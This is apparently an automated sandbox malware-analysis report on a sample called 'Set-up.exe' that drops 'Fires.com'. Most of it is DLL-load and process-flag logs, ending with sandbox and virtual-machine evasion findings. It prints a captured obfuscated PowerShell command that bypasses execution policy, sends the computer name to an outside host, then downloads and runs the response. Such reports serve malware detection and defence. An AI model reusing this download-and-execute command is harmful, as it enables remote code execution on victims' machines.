Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\'Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 'Set-up.exe

Static file information: File size 73410924 > 1048576

Source: 'Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb\| source: powershell.exe, 00000011.00000002.2235876562.0000000007356000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD source: powershell.exe, 00000011.00000002.2235605610.00000000072E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2235442056.0000000007289000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2235442056.0000000007289000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2235769377.0000000007328000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2230662155.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbk source: powershell.exe, 00000011.00000002.2235876562.0000000007356000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;			Jump to behavior

Source: C:\Users\user\Desktop\'Set-up.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00D60DE6 push ecx; ret

12_2_00D60DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DD26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		12_2_00DD26DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D5FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		12_2_00D5FC7C

Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_12-104243

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

